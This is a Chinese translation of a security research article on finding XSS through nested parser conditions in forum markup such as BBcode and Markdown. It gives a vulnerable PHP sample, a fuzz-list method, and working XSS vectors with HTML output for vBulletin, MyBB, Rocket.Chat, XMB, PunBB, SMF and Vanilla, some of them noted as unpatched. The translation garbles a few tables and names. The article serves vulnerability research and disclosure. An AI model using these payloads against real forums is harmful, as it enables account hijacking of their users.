通过嵌套解析器条件对 XSS 进行模糊测试

解析器

什么是解析器，它们在消息中的作用是什么？

解析器是在文本中查找子字符串的应用程序。在解析消息时，他们可以找到一个子字符串并将其转换为正确的 HTML 代码。

消息中众所周知的解析器

HTML 作为消息标记

一些已知的应用程序允许使用列入白名单的 HTML 标签，如

<b>

、

<u>

、

<img>

（WordPress、Vanilla 论坛等）。对于没有黑客心态的开发人员来说，在清理这些标签时很容易忽略一些可能性。这就是为什么我们认为允许即使是有限的标签列表也是开发人员最糟糕的选择之一。

BBcode

BBcode 是一种轻量级标记语言，用于在许多 Internet 论坛中格式化消息，于 1998 年首次推出。有几个 BBCode 和相应 HTML 代码的示例：

输入	输出
[b]text[/b]	<b>text</b>
[i]text[/i]	<i>text</i>
[url]http://google.com/[/url]	<a href="http://google.com/">http://google.com/</a>
[img]/favicon.ico[/img]	<img src="/favicon.ico" />

Markdown

Markdown 是一种轻量级标记语言，用于使用纯文本编辑器创建格式化文本。它于 2004 年首次推出。其他一些示例：

输入	输出
text	<b>text</b>
text	<i>text</i>
[text](http://google.com/)	<a href="http://google.com/">http://google.com/</a>
![text](/favicon.ico)	<img alt="text" src="/favicon.ico" />

AsciiDoc

AsciiDoc 是一种人类可读的文档格式，在语义上等同于 DocBook XML，但使用 2002 年引入的纯文本标记约定：

输入	输出
text	<b>text</b>
_text_	<i>text</i>
[text](http://google.com/)	<a href="http://google.com/">http://google.com/</a>
![text](/favicon.ico)	<img alt="text" src="/favicon.ico" />

reStructuredText

reStructuredText（RST、ReST 或 reST）是一种文本数据文件格式，主要用于 Python 编程语言社区的技术文档。于 2002 年首次推出：

输入	输出
text	<b>text</b>
text	<i>text</i>
`text <http://google.com/>`	<a href="http://google.com/">http://google.com/</a>
.. image:: /favicon.ico:alt: text	<img alt="text" src="/favicon.ico" />

其他知名解析器

除了消息和评论中的文本标记解析器之外，您还可以找到 URL 和电子邮件解析器、智能 URL 解析器，它们不仅可以理解 HTTP 链接，还可以理解图像或 YouTube 链接并将其转换为 HTML。此外，您还可以找到从文本变成图片的表情符号和表情符号、指向用户个人资料的链接以及可点击的主题标签：

输入	输出
:)	<img src="/images/smile.jpg" alt=":)">
:smile:	<img src="/images/smile.jpg" alt=":smile:">
[email protected]	<a href="mailto:[email protected]">[email protected]</a>
https://www.youtube.com/watch?v=L_LUpnjgPso	<iframe src="https://www.youtube.com/embed/L_LUpnjgPso"></iframe>
http://google.com/image.jpg	<img src="http://google.com/image.jpg">
#hashtag	<a href="search?q=%23hashtag">#hashtag</a>
@username	<a href="/profile/username">@username</a>

我们对这个功能中的错误了解多少？

如果您在 google 上搜索“markdown XSS”，您会发现缺少 HTML 字符和 URL 方案清理的示例。让我们从他们开始。

缺少 HTML 字符清理

当解析器将用户输入转换为 HTML 并且同时不清理 HTML 字符时，存在漏洞。它可能会影响诸如尖括号

(0x3c) 之类的字符，这些字符负责打开新的 HTML 标签和引号

(0x22)、

(0x27)，它们负责 HTML 属性的开头和结尾：

输入	输出
[url]http://google.com/<img src=s onerror=alert(1)>[/url]	<a href="http://google.com/%3cimg%20src=s%20onerror=alert(1)%3e">http://google.com/<img src=s onerror=alert(1)></a>
[img]/favicon.ico?id="onload="alert(1)[/img]	<img src="/favicon.ico?id="onload="alert(1)" />

缺少“javascript:” URL 方案清理

当解析器转换包含 URL 的用户输入时，可以利用此漏洞。如果此类解析器不清理“javascript:” URL 方案，它将允许攻击者执行任意 JavaScript 并执行 XSS 攻击：

输入	输出
[url=javascript:alert(1)]Click me![/url]	<a href="javascript:alert(1)">Click me!</a>
[video]javascript:alert(1)[/video]	<iframe src="javascript:alert(1)"></iframe>

缺少“文件：”URL 方案清理

这是解析器转换包含 URL 的用户输入时的另一个漏洞。这次的原因是“file://” URL 方案清理不足。此漏洞可能导致对桌面应用程序的严重攻击。例如，使用 JavaScript 读取任意客户端文件，使用纯 HTML 执行任意客户端文件，NTLM 哈希泄漏。它们可用于对 Windows 用户进行“传递哈希”或离线密码暴力攻击：

输入	输出
[url]file://1.3.3.7/test.txt[/url]	<a href="file://1.3.3.7/test.html">file://1.3.3.7/test.txt</a>
[video]file://localhost/C:/windows/system32/calc.exe[/video]	<iframe src="file://localhost/C:/windows/system32/calc.exe"></iframe>
[img]file://1.3.3.7/test.jpg[/img]	<img src="file://1.3.3.7/test.jpg">

解码

当解析器将用户输入转换为 HTML、清理 HTML 字符，但在它从已知编码解码用户输入之后存在漏洞。HTML 相关编码可以是 urlencode

– (%22) 或 HTML 实体转换

– ("e;/"/")

输入	输出
[url]http://google.com/test%22test%2522test%252522[/url]	<a href="http://google.com/test"test"test""></a>
[url]http://google.com/test"e;test&quote;test&quote;[/url]	<a href="http://google.com/test"test"test""></a>

具有嵌套条件的解析器

嵌套条件是当一个负载由两个不同的解析器处理时，通过一些操作，我们可以将任意 JavaScript 注入页面。这些漏洞很容易被开发人员和黑客忽视。

但是，我们发现了这种类型的错误，您可以通过模糊测试轻松找到！

这是一个易受攻击的应用程序的 PHP 代码示例：

<?php
function returnCLickable($input)
{
    $input = preg_replace('/(http|https|files):\/\/[^\s]*/', '<a href="${0}">${0}</a>', $input);
    $input = preg_replace('/([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)(\?\w*=[^\s]*|)/', '<a href="mailto:${0}">${0}</a>', $input);
    $input = preg_replace('/\n/', '<br>', $input);
    return $input . "\n\n";
}
$message = returnCLickable(htmlspecialchars($_REQUEST['msg']));
?>

复制

用户输入作为经过清理的文本传递给函数的参数，该函数

returnClickable

查找 url 和电子邮件并返回可点击元素的 HTML 代码。

起初看起来很安全，但如果您尝试在 URL 中发送包含电子邮件的字符串，解析器将返回损坏的 HTML 代码，并且您的用户输入将从 HTML 属性值迁移到 HTML 属性名称。

输入	输出
http://google.com/[email protected]?subject='qwe'onmouseover='alert(1)'	<a href="http://google.com/<a href="mailto:[email protected]?subject='qwe'onmouseover='alert(1)'">http://google.com/[email protected]?subject=''onmouseover='alert(1)'</a>">[email protected]?subject=''onmouseover='alert(1)'">http://google.com/[email protected]?subject=''onmouseover='alert(1)'</a></a>

模糊列表构建逻辑

为了更好地理解，我们将向您展示一个 vBulletin 示例。这是通过嵌套解析器发现 XSS 的模糊列表片段。易受攻击的 BBcode 标签是

[video]

，允许我们插入新 HTML 属性的标签是

[font]

：

[img]http://aaa.ru/img/header.jpg[font=qwe]qwe[/font]qwe[/img]
[VIDEO="qwe[font=qwe]qwe[/font];123"]qwe[/VIDEO]
[VIDEO="qwe;123"]qw[font=qwe]qwe[/font]e[/VIDEO]
[video="youtube;123[font=qwe]qwe[/font]"]https://www.youtube.com/watch?v=jEn2cln7szEq[/video]
[video=twitch;123]https://www.twitch.tv/videos/285048327?collection=-41EjFuwRRWdeQ[font=qwe]qwe[/font][/video]
[video=youtube;123]https://www.youtube.com/watch?v=jEn2cln7szE[font=qwe]qwe[/font][/video]
[video=vimeo;123]https://vimeo.com/channels/staffpicks/285359780[font=qwe]qwe[/font][/video]
[video=mixer;123]https://www.facebook.com/gaming/?type=127929-Minecraft[font=qwe]qwe[/font][/video]
[video=metacafe;123]http://www.metacafe.com/watch/11718542/you-got-those-red-buns-hun/[font=qwe]qwe[/font][/video]
[video=liveleak;123]https://www.liveleak.com/view?i=715_1513068362[font=qwe]qwe[/font][/video]
[video=facebook;123]https://www.facebook.com/vietfunnyvideo/videos/1153286888148775[font=qwe]qwe[/font]/[/video]
[video=dailymotion;123]https://www.dailymotion.com/video/x6hx1c8[font=qwe]qwe[/font][/video]
[FONT=Ari[font=qwe]qwe[/font]al]qwe[/FONT]
[SIZE=11[font=qwe]qwe[/font]px]qwe[/SIZE]
[FONT="Ari[font=qwe]qwe[/font]al"]qwe[/FONT]
[SIZE="11[font=qwe]qwe[/font]px"]qwe[/SIZE]
[email]qwe@qw[font=qwe]qwe[/font]e.com[/email]
[email=qwe@qw[font=qwe]qwe[/font]e.com]qwe[/email]
[url]http://qwe@qw[font=qwe]qwe[/font]e.com[/url]
[url=http://qwe@qw[font=qwe]qwe[/font]e.com]qwe[/url]
[email="qwe@qw[font=qwe]qwe[/font]e.com"]qwe[/email]
[url="http://qwe@qw[font=qwe]qwe[/font]e.com"]qwe[/url]

复制

第1步

枚举可以转换为 HTML 代码的所有可能字符串并保存到列表 B：

http://google.com/?param=value
http://username:[email protected]/
[color=colorname]text[/color]
[b]text[/b]
:smile:

复制

第2步

保存允许您将 HTML 中的参数作为插入点传递到列表 A 的行，并标记列表 B 中的有效负载将被插入的位置。您还可以使用列表 C 来检查 HTML 字符清理、Unicode 支持或 1 字节模糊测试：

http://google.com/?param=va%listC%%listB%lue
http://username:pass%listC%%listB%[email protected]/
[color=color%listC%%listB%name]text[/color]

复制

第 3 步

使用列表 A、B 和 C 生成模糊列表：

http://google.com/?param=va<[color=colorname]text[/color]lue
http://username:pass<[b]text[/b][email protected]/
[color=color<:smile:name]text[/color]

复制

异常检测

方法 1 – 视觉

当您看不到 HTTP 流量或返回消息的 HTML 源时，您可以在桌面/移动应用程序上使用此方法。

预期结果：HTML 代码块 (

">

" >

"/>

) 变得可见。

方法二——正则表达式

当您应用全自动模糊测试时，可以使用此方法。

例如，我们使用正则表达式来搜索

HTML 属性内的开始 HTML 标记字符：

我们使用 BurpSuite Intruder 将这种模糊测试技术应用于 vBulletin 板。我们按包含所用正则表达式的真/假条件的第七列对结果表进行排序。在屏幕截图的底部，您可以看到成功测试用例的 HTML 源代码，其中找到并通过我们的正则表达式规则突出显示的子字符串：

发现的漏洞

这不是一个完整的列表，一些供应商没有打补丁，还有一些我们不能透露的......

vBulletin < 5.6.4 PL1、5.6.3 PL1、5.6.2 PL2

CVE：未分配

XSS向量（视频BBcode+字体BBcode）：

[VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO]

复制

HTML 输出：

<a class="video-frame h-disabled" href="a<span style="font-family:a onmouseover=alert(location) a">a</span>a" data-vcode="000" data-vprovider="aaa">

复制

MyBB

CVE：CVE-2021-27279。

XSS 向量（emal BBcode + email BBcode 另一种语法）：

[email][email protected]?[[email protected]? onmouseover=alert(1) a]a[/email][/email]

复制

HTML 输出：

<a href="mailto:[email protected]?<a href="mailto:[email protected]? onmouseover=alert(1) a" class="mycode_email">a" class="mycode_email">[email protected]?[[email protected]? onmouseover=alert(1) a]a</a></a>

复制

维基百科

CVE：CVE-2021-29231

XSS 向量（div 标题 wikitext + font-family wikitext）：

%define=aa font-family='a="a'%
 
(:div title='a%aa% a' style='a':)"onmouseover="alert(1)"
test

复制

HTML 输出：

<div title='a<span  style='font-family: a="a;'> a' style='a' >"onmouseover="alert(1)"</span> <p>test

复制

Rocket.Chat

CVE：CVE-2021-22886

XSS 向量（url 解析器 + markdown url）：

[ ](http://www.google.com)
www.google.com/pa<http://google.com/onmouseover=alert(1); a|Text>th/a

复制

HTML 输出：

<a href="http://www.google.com/pa<a data-title="http://google.com/onmouseover=alert(1); a" href="http://google.com/onmouseover=alert(1); a" target="_blank" rel="noopener noreferrer">Text</a>th/a" target="_blank" rel="noopener noreferrer">www.google.com/pa<a data-title="http://google.com/onmouseover=alert(1); a" href="http://google.com/onmouseover=alert(1); a" target="_blank" rel="noopener noreferrer">Text</a>th/a</a>

复制

XMB

CVE：CVE-2021-29399

XSS 向量（URL BBcode + URL BBcode 另一种语法）：

[url]http://a[url=http://onmouseover=alert(1)// a]a[/url][/url]

复制

HTML 输出：

<a href='http://a<a href='http://onmouseover=alert(1)// a' onclick='window.open(this.href); return false;'>a' onclick='window.open(this.href); return false;'>http://a[url=http://onmouseover=alert(1)// a]a</a></a>

复制

SCEditor < 3 / SMF 2.1 – 2.1 RC3

CVE：未分配

XSS 向量（BBcode + BBcode）：

[email]a@a[size="onfocus=alert(1) contenteditable tabindex=0 id=xss q"]a[/email].a[/size]

复制

HTML 输出：

<a href="mailto:a@a<font size="onfocus=alert(1) contenteditable tabindex=0 id=xss q">a</font>">a@a<font size="onfocus=alert(1) contenteditable tabindex=0 id=xss q">a</font></a><font size="onfocus=alert(1) contenteditable tabindex=0 id=xss q">.a</font>

复制

PunBB

CVE：CVE-2021-28968

XSS向量（emal BBcode + url BBcode inside b BBcode）：

[email][email protected][b][url]http://onmouseover=alert(1)//[/url][/b]a[/email]

复制

HTML 输出：

<a href="mailto:[email protected]<strong><a href="http://onmouseover=alert(1)//">http://onmouseover=alert(1)//</a></strong>a">[email protected]<strong><a href="http://onmouseover=alert(1)//">http://onmouseover=alert(1)//</a></strong>a</a>

复制

香草论坛

CVE：未分配

XSS 向量（HTML <img alt> + HTML <img>）：

<img alt="<img onerror=alert(1)//"<">

复制

HTML 输出：

img alt="<img onerror=alert(1)//" src="src" />

复制

消除建议

根据我们的发现，我们可以说，即使是具有嵌套条件的解析器也可以保护的最佳清理选项之一是将用户输入完整编码为 HTML 实体：

例如，让我们看看已经打过补丁的 Phorum CMS。

在此 CMS 的最后一个版本中，其中一个 BBcodes 将所有用户输入编码为 HTML 实体。当我们试图在以前的版本上重现它时，这是一个 XSS。这个补丁确实是一个很好的例子：

my e-mail: [email][email protected][/email]

复制